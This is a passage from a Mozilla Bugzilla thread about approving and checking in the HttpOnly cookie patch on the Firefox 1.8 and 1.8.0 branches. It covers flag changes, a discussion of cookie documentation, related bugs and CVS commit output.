Flags: blocking1.8.1.5?
Comment 133•17 years ago
Are there any plans to apply this soon?
I'm just asking because Firefox 2.0.0.4 just came out, it hasn't been applied, and it would seem that you've already got the patch ready, and so on.
Updated•17 years ago
Flags: blocking1.8.1.5? → blocking1.8.1.5+
Comment 134•17 years ago
Comment on attachment 260254 [details] [diff] [review]
Patch for the 1.8 branch (fixed)
approved for 1.8.1.5, a=dveditz for release-drivers
Attachment #260254 -
Flags: approval1.8.1.5? → approval1.8.1.5+
Comment 135•17 years ago
Comment on attachment 260254 [details] [diff] [review]
Patch for the 1.8 branch (fixed)
Hang on, unapproving while we check whether we have the scope to get this in this time.
Attachment #260254 -
Flags: approval1.8.1.5+ → approval1.8.1.5?
Comment 136•17 years ago
Comment on attachment 260254 [details] [diff] [review]
Patch for the 1.8 branch (fixed)
approved for 1.8.1.5, a=dveditz for release-drivers
Attachment #260254 -
Flags: approval1.8.1.5? → approval1.8.1.5+
Comment 137•17 years ago
Should we take any other httponly patches with this like bug 384872?
Comment 138•17 years ago
Bug 383181 should be taken on the branch; I'll post patches for both trunk and branch there.
Comment 139•17 years ago
Those are on the blocking list; we'll approve them when we get patches (more concerned about bug 383181, though 384872 would be nice too). Are there others?
Updated•17 years ago
Depends on: CVE-2009-0357
Comment 140•17 years ago
checked in on 1.8 branch. thanks mkaply and ronnie!
Keywords: fixed1.8.1.5
Updated•17 years ago
Attachment #260254 -
Flags: approval1.8.0.13?
Updated•17 years ago
Attachment #260254 -
Flags: approval1.8.0.13? → approval1.8.0.14?
Updated•17 years ago
Keywords: dev-doc-needed
Comment 141•17 years ago
Since we don't actually document the attributes of cookies, I'm calling this documented with the addition of a note to the Fx3 for developers page. If anyone can think of other places it should be mentioned (I spent a few hours trying to find them), let me know.
Keywords: dev-doc-needed → dev-doc-complete
Comment 142•17 years ago
(In reply to comment #141)
> Since we don't actually document the attributes of cookies, I'm calling this
> documented with the addition of a note to the Fx3 for developers page. If
> anyone can think of other places it should be mentioned (I spent a few hours
> trying to find them), let me know.
Hmm... this seems bad. ;)
Should we be documenting the mozilla implementation of cookies somewhere? How attributes are interpreted, applied, etc? I think most webdevs just test firefox to figure out how things work, which is probably prudent but also inefficient. And the spec (RFC2109) isn't that useful, since we deviate from it (and rightly so) in many ways; it's also outdated (e.g. this bug).
Sheppy, any opinion here?
Comment 143•17 years ago
Yes, we need documentation on our cookies implementation, but at present we don't have any. If someone would like to write some up, please do... otherwise, could someone please file a bug against MDC and include some pointers to information resources that will help when someone has time to do the writing?
Comment 144•17 years ago
bug 398441 filed for documentation.
Updated•17 years ago
Attachment #260254 -
Flags: approval1.8.0.14? → approval1.8.0.15?
Comment 145•17 years ago
Comment on attachment 260254 [details] [diff] [review]
Patch for the 1.8 branch (fixed)
a=asac for 1.8.0.15
(shipped unmodified by distros for some time)
Attachment #260254 -
Flags: approval1.8.0.15? → approval1.8.0.15+
Updated•17 years ago
Keywords: checkin-needed
Updated•17 years ago
Flags: blocking1.8.0.15+
Comment 146•17 years ago
Alexander, I don't see your name on the drivers list for Mozilla. Please read http://www.mozillazine.org/articles/article2779.html and don't set blocking or approval flags again.
Flags: blocking1.8.0.15+
Keywords: checkin-needed
Updated•17 years ago
Attachment #260254 -
Flags: approval1.8.0.15+ → approval1.8.0.15?
Comment 147•17 years ago
Comment on attachment 260254 [details] [diff] [review]
Patch for the 1.8 branch (fixed)
Wladimir, caillon and I do approvals for the EOL 1.8.0 branch now.
Attachment #260254 -
Flags: approval1.8.0.15? → approval1.8.0.15+
Updated•17 years ago
Flags: blocking1.8.0.15+
Comment 148•17 years ago
(In reply to comment #146)
> Alexander, I don't see your name on the drivers list for Mozilla. Please read
> http://www.mozillazine.org/articles/article2779.html and don't set blocking or
> approval flags again.
asac (Debian/Ubuntu) and caillon (Red Hat) have taken over as drivers for the
1.8.0 branch from the normal Mozilla drivers, as that branch is no longer
supported by Mozilla. The Linux distros wanted to continue to maintain it, as
they still support these old packages, and it is just easier to use one repo
instead of every distro keeping track of backported packages.
Honestly, do you think we would allow anybody to grant one of the blocking or
approval flags? There are access checks in place, you know! ;)
Comment 149•17 years ago
(In reply to comment #148)
> There are access checks in place, you know! ;)
Oh, there are now? Good to know. Sorry, I didn't notice that this is about the 1.8.0 branch.
Comment 150•17 years ago
If you land this on the 1.8.0 branch, don't forget to also nominate and take the fix in bug 383181 (they should probably be merged as one patch at this point).
I was going to commit this and the patch for bug 383181, but that build failed because it needed HttpOnly, which appears to be available only in the patch on this bug that has the 1.8.1.4- flag. It looks like this was committed in one big "mega commit" that encompassed those two and a third bug: http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&module=all&branch=MOZILLA_1_8_BRANCH&branchtype=match&dir=mozilla%2Fnetwerk%2Fcookie%2F&file=&filetype=match&who=&whotype=match&sortby=Date&hours=2&date=explicit&mindate=2007-07-10&maxdate=&cvsroot=%2Fcvsroot
Additionally, it caused bug 384872 (https://bugzilla.mozilla.org/show_bug.cgi?id=384872), but I don't believe that fix is needed since session store didn't exist back then. Nonetheless, while the patches apply without change, I'd like a sanity check from you, dwitte, to make sure we have all the needed bits for 1.8.0.15.
Attachment #310505 -
Flags: review?(dwitte)
Updated•17 years ago
Attachment #310505 -
Attachment description: Combined patch → Combined patch for 1.8.0.x
Comment 152•17 years ago
Comment on attachment 310505 [details] [diff] [review]
Combined patch for 1.8.0.x
looks good; you do indeed want bug 387543 as well. those three bugs should do it.
r=dwitte
Attachment #310505 -
Flags: review?(dwitte) → review+
Comment on attachment 310505 [details] [diff] [review]
Combined patch for 1.8.0.x
Thanks for the quick comments. Carrying over a=asac for this.
Attachment #310505 -
Flags: approval1.8.0.15+
Checking in public/nsICookie2.idl;
/cvsroot/mozilla/netwerk/cookie/public/nsICookie2.idl,v <-- nsICookie2.idl
new revision: 1.3.66.1; previous revision: 1.3
done
Checking in src/nsCookie.cpp;
/cvsroot/mozilla/netwerk/cookie/src/nsCookie.cpp,v <-- nsCookie.cpp
new revision: 1.9.36.1; previous revision: 1.9
done
Checking in src/nsCookie.h;
/cvsroot/mozilla/netwerk/cookie/src/nsCookie.h,v <-- nsCookie.h
new revision: 1.11.36.1; previous revision: 1.11
done
Checking in src/nsCookieService.cpp;
/cvsroot/mozilla/netwerk/cookie/src/nsCookieService.cpp,v <-- nsCookieService.cpp
new revision: 1.43.8.1.2.3; previous revision: 1.43.8.1.2.2
done
Checking in src/nsCookieService.h;
/cvsroot/mozilla/netwerk/cookie/src/nsCookieService.h,v <-- nsCookieService.h
new revision: 1.17.30.1; previous revision: 1.17
done
Keywords: fixed1.8.0.15